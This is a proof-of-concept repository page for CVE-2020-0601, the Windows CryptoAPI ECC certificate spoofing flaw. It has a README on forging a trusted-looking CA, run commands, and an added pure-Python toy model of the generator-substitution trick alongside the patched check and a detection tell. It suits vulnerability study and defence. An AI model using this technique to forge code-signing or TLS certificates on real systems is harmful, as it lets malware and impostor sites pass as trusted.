CVE-2020-0601 PoC: Microsoft Windows CryptoAPI trust-management vulnerability

Associated vulnerability: Microsoft Windows CryptoAPI trust-management vulnerability (CVE-2020-0601)
Description: A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source, aka 'Windows CryptoAPI Spoofing Vulnerability'.

Repository description: Proof of Concept for CVE-2020-0601

README
# BADECPARAMS

Proof of Concept for CVE-2020-0601.

![Screenshot of Extended Validation certificate for www.nsa.gov in Microsoft Edge](screenshot.png)
![Screenshot of 7-Zip installer with Authenticode digital signature](screenshot2.png)
![Screenshot of certificate for www.nsa.gov in Google Chrome](screenshot3.png)

[badecparams.py](badecparams.py) generates an intermediate certificate
authority that exploits the vulnerability: its certificate reuses the public
key point of a trusted ECC root but carries explicit EC parameters with an
attacker-chosen generator, so CryptoAPI matches it to the trusted root while
the attacker holds a private key that works under those parameters. The script
then issues Authenticode and TLS certificates from that CA. The TLS
certificates show Extended Validation in Microsoft Edge and Internet Explorer.
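The parameter trick the script relies on, shown as an added toy model in pure Python (this is not the PoC's own code and generates no X.509; it uses NIST P-256 for brevity, constructed keys, a caller-supplied nonce instead of RFC 6979, and a trust store keyed by public-key point the way CryptoAPI's cache lookup was). `forge_parameters` picks the generator G' = d'^-1 * Q so that the attacker's key d' reproduces the root's public key Q; `verify_with_store` with `check_params=False` reproduces the vulnerable behaviour, and with `check_params=True` the fix of refusing explicit parameters that differ from the trusted key's curve:

```python
import hashlib

# NIST P-256 domain parameters (FIPS 186-4). The real PoC targets a Comodo
# ECC root; P-256 is used here only to keep the toy model short.
P256 = {
    "p": 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff,
    "a": 0xffffffff00000001000000000000000000000000fffffffffffffffffffffffc,
    "b": 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b,
    "G": (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
          0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5),
    "n": 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551,
}


def ec_add(curve, P, Q):
    """Affine point addition; None is the point at infinity."""
    if P is None:
        return Q
    if Q is None:
        return P
    p, a = curve["p"], curve["a"]
    (x1, y1), (x2, y2) = P, Q
    if x1 == x2 and (y1 + y2) % p == 0:
        return None
    if P == Q:
        lam = (3 * x1 * x1 + a) * pow(2 * y1, -1, p) % p
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, p) % p
    x3 = (lam * lam - x1 - x2) % p
    return (x3, (lam * (x1 - x3) - y1) % p)


def ec_mul(curve, k, P):
    """Double-and-add scalar multiplication (not constant-time; demo only)."""
    R = None
    while k:
        if k & 1:
            R = ec_add(curve, R, P)
        P = ec_add(curve, P, P)
        k >>= 1
    return R


def hash_to_int(msg, n):
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") % n


def ecdsa_sign(curve, d, msg, k):
    """Textbook ECDSA under whatever generator `curve` carries."""
    n = curve["n"]
    r = ec_mul(curve, k, curve["G"])[0] % n
    s = pow(k, -1, n) * (hash_to_int(msg, n) + r * d) % n
    return (r, s)


def ecdsa_verify(curve, Q, msg, sig):
    """Verification uses the generator from the certificate's parameters."""
    n = curve["n"]
    r, s = sig
    if not (0 < r < n and 0 < s < n):
        return False
    w = pow(s, -1, n)
    X = ec_add(curve,
               ec_mul(curve, hash_to_int(msg, n) * w % n, curve["G"]),
               ec_mul(curve, r * w % n, Q))
    return X is not None and X[0] % n == r


def forge_parameters(trusted, Q, d_attacker):
    """Choose G' = d'^-1 * Q so that d' * G' == Q without the root's key."""
    g_prime = ec_mul(trusted, pow(d_attacker, -1, trusted["n"]), Q)
    return dict(trusted, G=g_prime)


def verify_with_store(trust_store, ca_pubkey, cert_params, tbs, sig, check_params):
    """Trusted keys are looked up by public-key point only (as CryptoAPI did).
    check_params=False reproduces CVE-2020-0601; True is the fixed behaviour."""
    if ca_pubkey not in trust_store:
        return False
    if check_params and cert_params != trust_store[ca_pubkey]:
        return False  # explicit parameters must equal the trusted key's curve
    return ecdsa_verify(cert_params, ca_pubkey, tbs, sig)


def demo():
    ca_priv = 0x1d2e3f4a5b6c7d8e9fa0b1c2d3e4f506  # constructed; unknown to attacker
    Q = ec_mul(P256, ca_priv, P256["G"])
    trust_store = {Q: P256}
    tbs = b"constructed leaf certificate body: CN=www.example.test"
    k = 0x7a7b7c7d7e7f808182838485868788  # constructed nonce for both signers
    honest_sig = ecdsa_sign(P256, ca_priv, tbs, k)          # root signs leaf
    d_atk = 0xbadec0badec0badec0badec0badec                  # attacker's key
    rogue = forge_parameters(P256, Q, d_atk)                 # same Q, new G'
    rogue_sig = ecdsa_sign(rogue, d_atk, tbs, k)             # attacker signs leaf
    return {
        "rogue_key_matches_root": ec_mul(rogue, d_atk, rogue["G"]) == Q,
        "honest_patched": verify_with_store(trust_store, Q, P256, tbs, honest_sig, True),
        "rogue_vulnerable": verify_with_store(trust_store, Q, rogue, tbs, rogue_sig, False),
        "rogue_patched": verify_with_store(trust_store, Q, rogue, tbs, rogue_sig, True),
    }


if __name__ == "__main__":
    print(demo())
```

In a real certificate the tell is an explicit `ECParameters` SEQUENCE in the SubjectPublicKeyInfo instead of a named-curve OID; `openssl x509 -text` prints the prime, coefficients and generator in that case rather than `ASN1 OID: prime256v1` or similar.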

[httpd.py](httpd.py) serves the contents of the [www](www) subfolder over
HTTPS, using the PEM encoded certificate chain provided on the command line.

```shell
./badecparams.py
./httpd.py localhost.key
```

### Vulnerable Software

Windows Update is not vulnerable because it uses public key pinning and RSA
keys.

The latest Windows Defender antivirus definitions detect executables signed
with malicious Authenticode certificates, even on machines without Microsoft's
patch.

Microsoft Edge, Internet Explorer, and Chromium (and derivatives) are
vulnerable to the TLS variant. Firefox is not vulnerable because Mozilla's
Network Security Services (NSS) does not support explicit EC parameters and
uses its own implementation for certificate verification.

Chrome 79.0.3945.130 fixes the vulnerability and throws
`NET::ERR_CERT_INVALID`, even on machines without Microsoft's patch.
File snapshot

```text
/data/pocs/b7274a40054e224cb7487615121beb841474c014
├── [ 12K] badecparams.py
├── [4.3K] comodoecccertificationauthority-ev-comodoca-com-chain.pem
├── [ 861] httpd.py
├── [1.4K] README.md
├── [180K] screenshot2.png
├── [448K] screenshot3.png
├── [316K] screenshot.png
└── [4.0K] www
    └── [ 205] index.html

1 directory, 8 files
```